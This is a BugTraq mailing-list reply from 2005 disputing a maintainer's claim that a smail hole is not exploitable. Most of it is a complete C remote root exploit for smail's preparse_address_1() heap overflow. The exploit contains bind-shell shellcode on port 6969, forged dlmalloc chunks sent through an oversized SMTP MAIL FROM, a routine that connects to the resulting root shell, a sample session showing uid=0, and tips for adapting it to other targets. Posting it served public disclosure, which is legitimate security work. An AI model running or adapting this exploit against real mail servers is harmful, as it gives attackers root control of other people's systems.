BugTraq
Re: smail remote and local root holes (no, not really ;-) Mar 25 2005 08:50PM
Greg A. Woods (woods-smail planix com) (2 replies)
Re: smail remote and local root holes (really, it is exploitable) Mar 28 2005 04:42AM
sean (infamous41md hotpop com)
Greg, I noticed there are actually two vulnerabilities here. The one I posted,
and then the fact that the 'ap' pointer can be as long as one likes, and it will
be strcat()'d to the 'p' pointer.

/*
*
* 0
*
* smail preparse_address_1() heap bof remote root exploit
*
* infamous42md AT hotpop DOT com
*
* Shouts:
*
* BMF, wipe with the left, eat with the right
*
* Notes:
*
* You can't have any characters in overflow buffer that isspace() returns true
* for. The shellcode is clear of them, but if your return address or retloc
* has one you gotta figure out another one. My slack box has that situation,
* heap is at 0x080d.. My gentoo laptop had no such problem and all was fine. I
* don't have anymore time to BS around with this and make perfect for any and
* all, b/c I've got exam to study for and Law and Order:CI is on in an hour.
* If the heap you're targetting is the same way, then try filling it up using
* some other commands. If the GOT you're targetting is at such address than
* overwrite a return address on the stack. Surely there's a way, check out the
* source and be creative; I'm sure there are some memory leaks somewhere you
* can use to fill up heap as well.
*
* You might run into some ugliness trying to automate this for a couple
* reasons. xmalloc() stores a cookie in front of buffer, and xfree() checks
* for this cookie before calling free(). So you're going to need that aligned
* properly unless you can cook up a way to exploit it when it bails out in
* xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so
* maybe you can be clever and do something there). Furthermore I found that
* when trying to trigger this multiple times the alignment was different each
* time. There are "definitely" more reliable ways to exploit this if you take
* a deeper look into code which I don't have time to do right now. The padding
* parameter controls the alignment and the size of the chunk being allocated.
* You'll probably have to play with it. Yes that's fugly.
*
* [n00b (at) crapbox (dot) oute [email concealed]rnet] ./a.out
* Usage: ./a.out < host > < padding > < retloc > < retaddr >
*
* [n00b (at) crapbox (dot) oute [email concealed]rnet] ./a.out localhost 64 0xbffff39c 0x8111ea0
* --{ Smack 1.oohaah
*
* --{ definitely, adv.:
* --{ 1. Having distinct limits
* --{ 2. Indisputable; certain
* --{ 3. Clearly defined; explicitly precise
*
* --{ Said HELO
*
* --{ Sent MAIL FROM overflow
*
* --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
*
* --{ Attempting to redefine the meaning of 'definitely'
*
* --{ Got a shell
*
* --{ Updating Webster's
* --{ definitely, adv.:
* --{ 1. See specious
*
* --{ For the linguistically challenged...
* --{ specious, adj. :
* --{ 1. Having the ring of truth or plausibility but actually fallacious
* --{ 2. Deceptively attractive
*
* id
* uid=0(root) gid=0(root)
* echo PWNED
* PWNED
*
* - Connection closed by user
*
*/

#include <stdio.h>
#include <ctype.h>
#include <sys/types.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/select.h>
#include <arpa/inet.h>

/* */
#define BS 0x1000
#define SMTP_PORT 25

#define Z(x, len) memset((x), 0, (len))
#define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0)
#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args);
#exit(EXIT_FAILURE); }while(0)

/* fat bloated call them shell code */
#define SHELL_LEN (sizeof(sc)-1)
#define SHELL_PORT 6969
#define NOP 0x90
char sc[] =
"\xeb\x0e""notexploitable"
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x04\x24\x02\x89\xe6\xb
0\x02"
"\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50\x6a\x01\x6
a\x02"
"\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a\x10\x56\x50\x89\xe
1\xb0"
"\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x0
4\xcd"
"\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc
0\x89"
"\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2
f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x6b\x2c\x6
0\xcd"
"\x80";

/* a dlmalloc chunk descriptor */
#define CHUNKSZ 0xfffffff8
#define CHUNKLEN sizeof(mchunk_t)
typedef struct _mchunk {
size_t dummy;
size_t prevsz;
size_t sz;
long fd;
long bk;
} mchunk_t;

/* */
ssize_t Send(int s, const void *buf, size_t len, int flags)
{
ssize_t n;

n = send(s, buf, len, flags);
if(n < 0)
die("send");

return n;
}

/* */
ssize_t Recv(int s, void *buf, size_t len, int flags)
{
ssize_t n;

n = recv(s, buf, len, flags);
if(n < 0)
die("recv");

return n;
}

/* */
int conn(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
struct sockaddr_in sa;

memset(&sa, 0, sizeof(sa));

hp = gethostbyname(host);
if (hp == NULL) {
bye("gethostbyname failed with error %s", hstrerror(h_errno));
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);

sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
die("socket");

if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
die("connect");

return sock;
}

/* */
void shell(char *host, u_short port)
{
int sock = 0, l = 0;
char buf[BS];
fd_set rfds;

sock = conn(host, port);

printf("--{ Got a shell\n\n"
"--{ Updating Webster's\n"
"--{ definitely, adv.:\n"
"--{ 1. See specious\n\n"
"--{ For the linguistically challenged...\n"
"--{ specious, adj. :\n"
"--{ 1. Having the ring of truth or plausibility but "
"actually fallacious\n"
"--{ 2. Deceptively attractive\n\n"
);

FD_ZERO(&rfds);

while (1) {
FD_SET(STDIN_FILENO, &rfds);
FD_SET(sock, &rfds);

if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
die("select");

if (FD_ISSET(STDIN_FILENO, &rfds)) {
l = read(0, buf, BS);
if(l < 0)
die("read");
else if(l == 0)
bye("\n - Connection closed by user\n");

if (write(sock, buf, l) < 1)
die("write");
}

if (FD_ISSET(sock, &rfds)) {
l = read(sock, buf, sizeof(buf));

if (l == 0)
bye("\n - Connection terminated.\n");
else if (l < 0)
die("\n - Read failure\n");

if (write(STDOUT_FILENO, buf, l) < 1)
die("write");
}
}
}

/* */
int parse_args(int argc, char **argv, char **host, int *npad,
u_int *retloc, u_int *retaddr)
{
if(argc < 5)
return 1;

*host = argv[1];

if(sscanf(argv[2], "%d", npad) != 1)
return 1;

if(sscanf(argv[3], "%x", retloc) != 1)
return 1;

if(sscanf(argv[4], "%x", retaddr) != 1)
return 1;

return 0;
}

/* */
void sploit(int sock, int npad, u_int retloc, u_int retaddr)
{
ssize_t n = 0;
u_char buf[BS], pad[BS], evil[BS];
mchunk_t chunk;

Z(buf, BS), Z(pad, BS), Z(evil, BS), Z(&chunk, CHUNKLEN);

/* read greeting */
n = Recv(sock, buf, BS, 0);
if(n == 0)
bye("Server didn't even say hi");

/* send HELO */
n = snprintf(buf, BS, "HELO localhost\r\n");
Send(sock, buf, n, 0);
Z(buf, BS);
n = Recv(sock, buf, BS, 0);
if(n == 0)
bye("Server didn't respond to HELO");

printf("--{ Said HELO\n\n");

/*
* Build evil chunk overflow. The need to align chunk exactly makes this
* not so robust. In my short testing I wasn't able to get free() called
* directly on an area of memory we control. I'm sure you can though if you
* take some time to study process heap behavior. Note though that you'll
* have to fill in the magic cookie field that xmalloc()/xfree() and some
* other functions use, so you'll still need to have it aligned properly
* which defeats the whole purpose. This exploits the free() call on the
* buffer we overflow, so you have to align the next chunk accordingly.
* Anyhow on newest glibc there is a check for negative size field on the
* chunk being freed, and program dies if it is negative (the exact
* condition is not negative, but it has that effect pretty much, but go
* look yourself ;)), So the techniques outlined by gera in phrack don't
* work (being able to point all chunks at our two evil chunks). Check out
* most recent glibc code in _int_free() if you haven't already.
*/
memset(pad, 'A', npad);

chunk.dummy = CHUNKSZ;
chunk.prevsz = CHUNKSZ;
chunk.sz = CHUNKSZ;
chunk.fd = retloc - 12;
chunk.bk = retaddr;
memcpy(evil, &chunk, CHUNKLEN);
evil[CHUNKLEN] = 0;

/* send the overflow */
n = snprintf(buf, BS, "MAIL FROM:<A!@A:%s> %s%s\n", pad, evil, sc);
Send(sock, buf, n, 0);
Z(buf, BS);

printf("--{ Sent MAIL FROM overflow\n\n");

#define SLEEP_TIME 15
setbuf(stdout, NULL);
printf("--{ Going for shell in ");
for(n = 0; n < SLEEP_TIME; n++){
printf("%d ", SLEEP_TIME-n);
sleep(1);
}
puts("\n");
}

/*
*/
int main(int argc, char **argv)
{
int sock = 0, npad = 0;
u_int retloc = 0, retaddr = 0;
char *host = NULL;

if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);

printf("--{ Smack 1.oohaah\n\n");

sock = conn(host, SMTP_PORT);

printf("--{ definitely, adv.:\n"
"--{ 1. Having distinct limits\n"
"--{ 2. Indisputable; certain\n"
"--{ 3. Clearly defined; explicitly precise\n\n"
);

sploit(sock, npad, retloc, retaddr);

printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");

shell(host, SHELL_PORT);

return EXIT_SUCCESS;
}

--
[ sean ]

[ reply ]
Re: smail remote and local root holes (no, really ;-) Mar 26 2005 09:31PM
sean (infamous41md hotpop com)


 

Privacy Statement
Copyright 2010, SecurityFocus